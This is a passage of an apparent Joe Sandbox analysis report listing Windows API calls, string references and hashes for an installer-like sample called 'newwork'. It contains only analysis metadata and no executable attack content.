                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                                                        • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                        • API String ID: 316262546-2767913252
                                                                                        • Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                        • Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
                                                                                        • Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                        • Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                                                        APIs
                                                                                        • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                        • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                        • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$Prop
                                                                                        • String ID:
                                                                                        • API String ID: 3887896539-0
                                                                                        • Opcode ID: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                        • Instruction ID: 06abc153636d574f2b9d5b42ed2ef1d3d1989bf2b09c04f5b7aa0ee96fd2bcf7
                                                                                        • Opcode Fuzzy Hash: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                        • Instruction Fuzzy Hash: 1011C975100244BFEF00DF9DDC84EDA37E8EB19364F144666B958DB2A2D738DD908B68
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
                                                                                        Strings
                                                                                        • WININIT.INI, xrefs: 004557E4
                                                                                        • PendingFileRenameOperations, xrefs: 00455754
                                                                                        • PendingFileRenameOperations2, xrefs: 00455784
                                                                                        • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                        • API String ID: 47109696-2199428270
                                                                                        • Opcode ID: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                        • Instruction ID: 0fa1da25f67206326559771d92c7e47b52ca8d856d575cc5f046ac455f5bab2a
                                                                                        • Opcode Fuzzy Hash: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                        • Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                        • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                                        • API String ID: 1375471231-2952887711
                                                                                        • Opcode ID: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                        • Instruction ID: e6577b7b61f0e0a35e690824fc442bae28cfcbc8f9cba78cd8161ab2dbd6b5d1
                                                                                        • Opcode Fuzzy Hash: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                        • Instruction Fuzzy Hash: E6412834A001099BDB11EFA5D882ADEB7B5EF45309F50843BE81577392DA38AE05CF68
                                                                                        APIs
                                                                                        • EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                        • GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                        • SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnumLongWindows
                                                                                        • String ID: \AB
                                                                                        • API String ID: 4191631535-3948367934
                                                                                        • Opcode ID: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                        • Instruction ID: 3ad81c14f5822e14e615a382c86082b2427cd388a5bf15486a3129e996868218
                                                                                        • Opcode Fuzzy Hash: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                        • Instruction Fuzzy Hash: D6115E70700610ABDB109F28E885F5677E8EB08715F10026AF994AB2E3C378ED41CB59
                                                                                        APIs
                                                                                        • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
                                                                                        • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,0049785D), ref: 0042DE6B
                                                                                        • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressDeleteHandleModuleProc
                                                                                        • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                        • API String ID: 588496660-1846899949
                                                                                        • Opcode ID: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                        • Instruction ID: e7246de0df94fba710dd2820c0ca51643d5dd29c3ac0bea476bad59fd0e01b91
                                                                                        • Opcode Fuzzy Hash: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                        • Instruction Fuzzy Hash: 73E06DF1B41B30AAD72022657C8ABA33729DB75365F658437F105AD19183FC2C50CE9D
                                                                                        Strings
                                                                                        • PrepareToInstall failed: %s, xrefs: 0046BE6E
                                                                                        • NextButtonClick, xrefs: 0046BC4C
                                                                                        • Need to restart Windows? %s, xrefs: 0046BE95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                        • API String ID: 0-2329492092
                                                                                        • Opcode ID: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                        • Instruction ID: 9de4db1b3e70fdebeced0fe060001c857bcfdee1b2562a0b259a97201065334e
                                                                                        • Opcode Fuzzy Hash: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                        • Instruction Fuzzy Hash: 46D12F34A00108DFCB14EB99D985AED77F5EF49304F5440BAE404EB362D778AE85CB9A
                                                                                        APIs
                                                                                        • SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
                                                                                        • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ActiveChangeNotifyWindow
                                                                                        • String ID: $Need to restart Windows? %s
                                                                                        • API String ID: 1160245247-4200181552
                                                                                        • Opcode ID: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                        • Instruction ID: 855c298393525188f16043e43c8caa20abfdb27870bda8f6eb76b0fac02994d3
                                                                                        • Opcode Fuzzy Hash: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                        • Instruction Fuzzy Hash: 7E918F34A042449FDB10EF69D8C6BAD77E0AF55708F5484BBE8009B362DB78AE05CB5D
                                                                                        APIs
                                                                                          • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                        • GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
                                                                                        • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
                                                                                        • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                        • String ID: Creating directory: %s
                                                                                        • API String ID: 2451617938-483064649
                                                                                        • Opcode ID: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                        • Instruction ID: a145aa70eb484b5d007d33f2831cd5d1f219efd535f83afbcf26a903565c5eea
                                                                                        • Opcode Fuzzy Hash: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                        • Instruction Fuzzy Hash: 7D512F74E00248ABDB01DBA5D982ADEBBF4AF49304F50847AEC50B7382D7795E08CB59
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressByteCharMultiProcWide
                                                                                        • String ID: SfcIsFileProtected$sfc.dll
                                                                                        • API String ID: 2508298434-591603554
                                                                                        • Opcode ID: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                        • Instruction ID: 709c5f55a6f5f8285c9c61fd8393730e8027effee09c5548c71846991cac34f0
                                                                                        • Opcode Fuzzy Hash: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                        • Instruction Fuzzy Hash: E8419671A04318DBEB20EF59DC85B9DB7B8AB4430DF5041B7A908A7293D7785F88CA1C
                                                                                        APIs
                                                                                        • 74D41520.VERSION(00000000,?,?,?,00497900), ref: 00452530
                                                                                        • 74D41500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 0045255D
                                                                                        • 74D41540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 00452577
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: D41500D41520D41540
                                                                                        • String ID: %E
                                                                                        • API String ID: 2153611984-175436132
                                                                                        • Opcode ID: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                        • Instruction ID: f5dca5bfdad9659449235e2d7a4f424f1fde127461be4d93bb02e754cc996b3f
                                                                                        • Opcode Fuzzy Hash: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                        • Instruction Fuzzy Hash: D2218331A00608BFDB01DAA989519AFB7FCEB4A300F554477F800E7242E6B9AE04C765
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0044B401
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectReleaseSelect
                                                                                        • String ID: %H
                                                                                        • API String ID: 1831053106-1959103961
                                                                                        • Opcode ID: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                        • Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
                                                                                        • Opcode Fuzzy Hash: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                        • Instruction Fuzzy Hash: 62216570A04248AFEB15DFA6C841B9F7BB9DB49304F11806AF904A7682D778D940CB59
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
                                                                                        • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                                                        • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: DrawText$ByteCharMultiWide
                                                                                        • String ID: %H
                                                                                        • API String ID: 65125430-1959103961
                                                                                        • Opcode ID: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                        • Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
                                                                                        • Opcode Fuzzy Hash: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                        • Instruction Fuzzy Hash: 2A11CBB27046047FEB00DB6A9C91D6F77ECDB49750F10817BF504D72D0D6399E018669
                                                                                        APIs
                                                                                        • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                          • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                          • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                        • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                        • String ID: SHAutoComplete$shlwapi.dll
                                                                                        • API String ID: 395431579-1506664499
                                                                                        • Opcode ID: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                        • Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
                                                                                        • Opcode Fuzzy Hash: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                        • Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
                                                                                        Strings
                                                                                        • PendingFileRenameOperations2, xrefs: 00455A4F
                                                                                        • PendingFileRenameOperations, xrefs: 00455A40
                                                                                        • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                        • API String ID: 47109696-2115312317
                                                                                        • Opcode ID: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                        • Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
                                                                                        • Opcode Fuzzy Hash: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                        • Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
                                                                                        APIs
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
                                                                                        • FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
